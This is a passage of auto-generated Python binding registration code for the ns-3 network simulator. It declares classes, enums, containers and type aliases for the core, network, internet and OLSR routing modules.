'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::OutputStreamWrapper', 'ns3::empty', 'ns3::DefaultDeleter<ns3::OutputStreamWrapper>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::QueueItem', 'ns3::empty', 'ns3::DefaultDeleter<ns3::QueueItem>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class] module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount')) ## socket.h (module 'network'): ns3::Socket [class] module.add_class('Socket', import_from_module='ns.network', parent=root_module['ns3::Object']) ## socket.h (module 'network'): ns3::Socket::SocketErrno [enumeration] module.add_enum('SocketErrno', ['ERROR_NOTERROR', 'ERROR_ISCONN', 'ERROR_NOTCONN', 'ERROR_MSGSIZE', 'ERROR_AGAIN', 'ERROR_SHUTDOWN', 'ERROR_OPNOTSUPP', 'ERROR_AFNOSUPPORT', 'ERROR_INVAL', 'ERROR_BADF', 'ERROR_NOROUTETOHOST', 'ERROR_NODEV', 'ERROR_ADDRNOTAVAIL', 'ERROR_ADDRINUSE', 'SOCKET_ERRNO_LAST'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::SocketType [enumeration] module.add_enum('SocketType', ['NS3_SOCK_STREAM', 'NS3_SOCK_SEQPACKET', 'NS3_SOCK_DGRAM', 'NS3_SOCK_RAW'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::SocketPriority [enumeration] module.add_enum('SocketPriority', ['NS3_PRIO_BESTEFFORT', 'NS3_PRIO_FILLER', 'NS3_PRIO_BULK', 'NS3_PRIO_INTERACTIVE_BULK', 'NS3_PRIO_INTERACTIVE', 'NS3_PRIO_CONTROL'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::Socket::Ipv6MulticastFilterMode [enumeration] module.add_enum('Ipv6MulticastFilterMode', ['INCLUDE', 'EXCLUDE'], outer_class=root_module['ns3::Socket'], import_from_module='ns.network') ## socket.h (module 'network'): ns3::SocketIpTosTag [class] module.add_class('SocketIpTosTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketIpTtlTag [class] module.add_class('SocketIpTtlTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag [class] module.add_class('SocketIpv6HopLimitTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketIpv6TclassTag [class] module.add_class('SocketIpv6TclassTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketPriorityTag [class] module.add_class('SocketPriorityTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag [class] module.add_class('SocketSetDontFragmentTag', import_from_module='ns.network', parent=root_module['ns3::Tag']) ## nstime.h (module 'core'): ns3::Time [class] module.add_class('Time', import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time::Unit [enumeration] module.add_enum('Unit', ['Y', 'D', 'H', 'MIN', 'S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core') ## nstime.h (module 'core'): ns3::Time [class] root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t']) ## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class] module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >']) ## trailer.h (module 'network'): ns3::Trailer [class] module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk']) ## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class] module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class] module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class] module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class] module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class] module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::AttributeAccessor [class] module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >']) ## attribute.h (module 'core'): ns3::AttributeChecker [class] module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >']) ## attribute.h (module 'core'): ns3::AttributeValue [class] module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >']) ## callback.h (module 'core'): ns3::CallbackChecker [class] module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## callback.h (module 'core'): ns3::CallbackImplBase [class] module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >']) ## callback.h (module 'core'): ns3::CallbackValue [class] module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ConstantRandomVariable [class] module.add_class('ConstantRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::DeterministicRandomVariable [class] module.add_class('DeterministicRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::EmpiricalRandomVariable [class] module.add_class('EmpiricalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## attribute.h (module 'core'): ns3::EmptyAttributeAccessor [class] module.add_class('EmptyAttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::AttributeAccessor']) ## attribute.h (module 'core'): ns3::EmptyAttributeChecker [class] module.add_class('EmptyAttributeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## attribute.h (module 'core'): ns3::EmptyAttributeValue [class] module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable [class] module.add_class('ErlangRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## event-impl.h (module 'core'): ns3::EventImpl [class] module.add_class('EventImpl', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >']) ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable [class] module.add_class('ExponentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable [class] module.add_class('GammaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## ipv4.h (module 'internet'): ns3::Ipv4 [class] module.add_class('Ipv4', import_from_module='ns.internet', parent=root_module['ns3::Object']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker [class] module.add_class('Ipv4AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue [class] module.add_class('Ipv4AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker [class] module.add_class('Ipv4MaskChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue [class] module.add_class('Ipv4MaskValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute [class] module.add_class('Ipv4MulticastRoute', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >']) ## ipv4-route.h (module 'internet'): ns3::Ipv4Route [class] module.add_class('Ipv4Route', import_from_module='ns.internet', parent=root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >']) ## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol [class] module.add_class('Ipv4RoutingProtocol', import_from_module='ns.internet', parent=root_module['ns3::Object']) ## ipv4-static-routing.h (module 'internet'): ns3::Ipv4StaticRouting [class] module.add_class('Ipv4StaticRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker [class] module.add_class('Ipv6AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue [class] module.add_class('Ipv6AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker [class] module.add_class('Ipv6PrefixChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue [class] module.add_class('Ipv6PrefixValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable [class] module.add_class('LogNormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker [class] module.add_class('Mac48AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## mac48-address.h (module 'network'): ns3::Mac48AddressValue [class] module.add_class('Mac48AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## net-device.h (module 'network'): ns3::NetDevice [class] module.add_class('NetDevice', import_from_module='ns.network', parent=root_module['ns3::Object']) ## net-device.h (module 'network'): ns3::NetDevice::PacketType [enumeration] module.add_enum('PacketType', ['PACKET_HOST', 'NS3_PACKET_HOST', 'PACKET_BROADCAST', 'NS3_PACKET_BROADCAST', 'PACKET_MULTICAST', 'NS3_PACKET_MULTICAST', 'PACKET_OTHERHOST', 'NS3_PACKET_OTHERHOST'], outer_class=root_module['ns3::NetDevice'], import_from_module='ns.network') ## net-device.h (module 'network'): ns3::NetDeviceQueue [class] module.add_class('NetDeviceQueue', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NetDeviceQueue, ns3::empty, ns3::DefaultDeleter<ns3::NetDeviceQueue> >']) ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface [class] module.add_class('NetDeviceQueueInterface', import_from_module='ns.network', parent=root_module['ns3::Object']) ## nix-vector.h (module 'network'): ns3::NixVector [class] module.add_class('NixVector', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >']) ## node.h (module 'network'): ns3::Node [class] module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object']) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable [class] module.add_class('NormalRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class] module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class] module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class] module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >']) ## packet.h (module 'network'): ns3::Packet [class] module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >']) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable [class] module.add_class('ParetoRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream']) ## net-device.h (module 'network'): ns3::QueueItem [class] module.add_class('QueueItem', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >']) ## net-device.h (module 'network'): ns3::QueueItem::Uint8Values [enumeration] module.add_enum('Uint8Values', ['IP_DSFIELD'], outer_class=root_module['ns3::QueueItem'], import_from_module='ns.network') ## nstime.h (module 'core'): ns3::TimeValue [class] module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## type-id.h (module 'core'): ns3::TypeIdChecker [class] module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker']) ## type-id.h (module 'core'): ns3::TypeIdValue [class] module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue']) ## address.h (module 'network'): ns3::AddressChecker [class] module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker']) ## address.h (module 'network'): ns3::AddressValue [class] module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue']) ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting [class] module.add_class('Ipv4ListRouting', import_from_module='ns.internet', parent=root_module['ns3::Ipv4RoutingProtocol']) module.add_container('std::vector< ns3::Ipv6Address >', 'ns3::Ipv6Address', container_type=u'vector') module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type=u'map') module.add_container('std::vector< unsigned int >', 'unsigned int', container_type=u'vector') ## Register a nested module for the namespace FatalImpl nested_module = module.add_cpp_namespace('FatalImpl') register_types_ns3_FatalImpl(nested_module) ## Register a nested module for the namespace Hash nested_module = module.add_cpp_namespace('Hash') register_types_ns3_Hash(nested_module) ## Register a nested module for the namespace TracedValueCallback nested_module = module.add_cpp_namespace('TracedValueCallback') register_types_ns3_TracedValueCallback(nested_module) ## Register a nested module for the namespace olsr nested_module = module.add_cpp_namespace('olsr') register_types_ns3_olsr(nested_module) def register_types_ns3_FatalImpl(module): root_module = module.get_root() def register_types_ns3_Hash(module): root_module = module.get_root() ## hash-function.h (module 'core'): ns3::Hash::Implementation [class] module.add_class('Implementation', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Hash::Implementation, ns3::empty, ns3::DefaultDeleter<ns3::Hash::Implementation> >']) typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash32Function_ptr') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash32Function_ptr*') typehandlers.add_type_alias(u'uint32_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash32Function_ptr&') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *', u'ns3::Hash::Hash64Function_ptr') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) **', u'ns3::Hash::Hash64Function_ptr*') typehandlers.add_type_alias(u'uint64_t ( * ) ( char const *, size_t ) *&', u'ns3::Hash::Hash64Function_ptr&') ## Register a nested module for the namespace Function nested_module = module.add_cpp_namespace('Function') register_types_ns3_Hash_Function(nested_module) def register_types_ns3_Hash_Function(module): root_module = module.get_root() ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a [class] module.add_class('Fnv1a', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32 [class] module.add_class('Hash32', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64 [class] module.add_class('Hash64', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3 [class] module.add_class('Murmur3', import_from_module='ns.core', parent=root_module['ns3::Hash::Implementation']) def register_types_ns3_TracedValueCallback(module): root_module = module.get_root() typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *', u'ns3::TracedValueCallback::Time') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) **', u'ns3::TracedValueCallback::Time*') typehandlers.add_type_alias(u'void ( * ) ( ns3::Time, ns3::Time ) *&', u'ns3::TracedValueCallback::Time&') def register_types_ns3_olsr(module): root_module = module.get_root() ## olsr-repositories.h (module 'olsr'): ns3::olsr::Association [struct] module.add_class('Association') ## olsr-repositories.h (module 'olsr'): ns3::olsr::AssociationTuple [struct] module.add_class('AssociationTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::DuplicateTuple [struct] module.add_class('DuplicateTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::IfaceAssocTuple [struct] module.add_class('IfaceAssocTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::LinkTuple [struct] module.add_class('LinkTuple') ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader [class] module.add_class('MessageHeader', parent=root_module['ns3::Header']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::MessageType [enumeration] module.add_enum('MessageType', ['HELLO_MESSAGE', 'TC_MESSAGE', 'MID_MESSAGE', 'HNA_MESSAGE'], outer_class=root_module['ns3::olsr::MessageHeader']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello [struct] module.add_class('Hello', outer_class=root_module['ns3::olsr::MessageHeader']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hello::LinkMessage [struct] module.add_class('LinkMessage', outer_class=root_module['ns3::olsr::MessageHeader::Hello']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna [struct] module.add_class('Hna', outer_class=root_module['ns3::olsr::MessageHeader']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Hna::Association [struct] module.add_class('Association', outer_class=root_module['ns3::olsr::MessageHeader::Hna']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Mid [struct] module.add_class('Mid', outer_class=root_module['ns3::olsr::MessageHeader']) ## olsr-header.h (module 'olsr'): ns3::olsr::MessageHeader::Tc [struct] module.add_class('Tc', outer_class=root_module['ns3::olsr::MessageHeader']) ## olsr-repositories.h (module 'olsr'): ns3::olsr::MprSelectorTuple [struct] module.add_class('MprSelectorTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple [struct] module.add_class('NeighborTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::NeighborTuple::Status [enumeration] module.add_enum('Status', ['STATUS_NOT_SYM', 'STATUS_SYM'], outer_class=root_module['ns3::olsr::NeighborTuple']) ## olsr-state.h (module 'olsr'): ns3::olsr::OlsrState [class] module.add_class('OlsrState') ## olsr-header.h (module 'olsr'): ns3::olsr::PacketHeader [class] module.add_class('PacketHeader', parent=root_module['ns3::Header']) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingProtocol [class] module.add_class('RoutingProtocol', parent=root_module['ns3::Ipv4RoutingProtocol']) ## olsr-routing-protocol.h (module 'olsr'): ns3::olsr::RoutingTableEntry [struct] module.add_class('RoutingTableEntry') ## olsr-repositories.h (module 'olsr'): ns3::olsr::TopologyTuple [struct] module.add_class('TopologyTuple') ## olsr-repositories.h (module 'olsr'): ns3::olsr::TwoHopNeighborTuple [struct] module.add_class('TwoHopNeighborTuple') module.add_container('std::vector< ns3::Ipv4Address >', 'ns3::Ipv4Address', container_type=u'vector') module.add_container('std::vector< ns3::olsr::MessageHeader::Hello::LinkMessage >', 'ns3::olsr::MessageHeader::Hello::LinkMessage', container_type=u'vector') module.add_container('std::vector< ns3::olsr::MessageHeader::Hna::Association >', 'ns3::olsr::MessageHeader::Hna::Association', container_type=u'vector') module.add_container('std::vector< ns3::olsr::MprSelectorTuple >', 'ns3::olsr::MprSelectorTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::NeighborTuple >', 'ns3::olsr::NeighborTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::TwoHopNeighborTuple >', 'ns3::olsr::TwoHopNeighborTuple', container_type=u'vector') module.add_container('ns3::olsr::MprSet', 'ns3::Ipv4Address', container_type=u'set') module.add_container('std::vector< ns3::olsr::LinkTuple >', 'ns3::olsr::LinkTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::TopologyTuple >', 'ns3::olsr::TopologyTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::IfaceAssocTuple >', 'ns3::olsr::IfaceAssocTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::AssociationTuple >', 'ns3::olsr::AssociationTuple', container_type=u'vector') module.add_container('std::vector< ns3::olsr::Association >', 'ns3::olsr::Association', container_type=u'vector') module.add_container('std::vector< ns3::olsr::RoutingTableEntry >', 'ns3::olsr::RoutingTableEntry', container_type=u'vector') module.add_container('std::set< unsigned int >', 'unsigned int', container_type=u'set') typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >', u'ns3::olsr::DuplicateSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >*', u'ns3::olsr::DuplicateSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::DuplicateTuple, std::allocator< ns3::olsr::DuplicateTuple > >&', u'ns3::olsr::DuplicateSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >', u'ns3::olsr::MprSelectorSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >*', u'ns3::olsr::MprSelectorSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MprSelectorTuple, std::allocator< ns3::olsr::MprSelectorTuple > >&', u'ns3::olsr::MprSelectorSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >', u'ns3::olsr::TopologySet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >*', u'ns3::olsr::TopologySet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TopologyTuple, std::allocator< ns3::olsr::TopologyTuple > >&', u'ns3::olsr::TopologySet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >', u'ns3::olsr::NeighborSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >*', u'ns3::olsr::NeighborSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::NeighborTuple, std::allocator< ns3::olsr::NeighborTuple > >&', u'ns3::olsr::NeighborSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >', u'ns3::olsr::LinkSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >*', u'ns3::olsr::LinkSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::LinkTuple, std::allocator< ns3::olsr::LinkTuple > >&', u'ns3::olsr::LinkSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >', u'ns3::olsr::MessageList') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >*', u'ns3::olsr::MessageList*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::MessageHeader, std::allocator< ns3::olsr::MessageHeader > >&', u'ns3::olsr::MessageList&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >', u'ns3::olsr::AssociationSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >*', u'ns3::olsr::AssociationSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::AssociationTuple, std::allocator< ns3::olsr::AssociationTuple > >&', u'ns3::olsr::AssociationSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >', u'ns3::olsr::Associations') typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >*', u'ns3::olsr::Associations*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::Association, std::allocator< ns3::olsr::Association > >&', u'ns3::olsr::Associations&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >', u'ns3::olsr::IfaceAssocSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >*', u'ns3::olsr::IfaceAssocSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::IfaceAssocTuple, std::allocator< ns3::olsr::IfaceAssocTuple > >&', u'ns3::olsr::IfaceAssocSet&') typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >', u'ns3::olsr::MprSet') typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >*', u'ns3::olsr::MprSet*') typehandlers.add_type_alias(u'std::set< ns3::Ipv4Address, std::less< ns3::Ipv4Address >, std::allocator< ns3::Ipv4Address > >&', u'ns3::olsr::MprSet&') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >', u'ns3::olsr::TwoHopNeighborSet') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >*', u'ns3::olsr::TwoHopNeighborSet*') typehandlers.add_type_alias(u'std::vector< ns3::olsr::TwoHopNeighborTuple, std::allocator< ns3::olsr::TwoHopNeighborTuple > >&', u'ns3::olsr::TwoHopNeighborSet&') def register_methods(root_module): register_Ns3Address_methods(root_module, root_module['ns3::Address']) register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList']) register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item']) register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer']) register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator']) register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator']) register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item']) register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList']) register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator']) register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item']) register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase']) register_Ns3EventGarbageCollector_methods(root_module, root_module['ns3::EventGarbageCollector']) 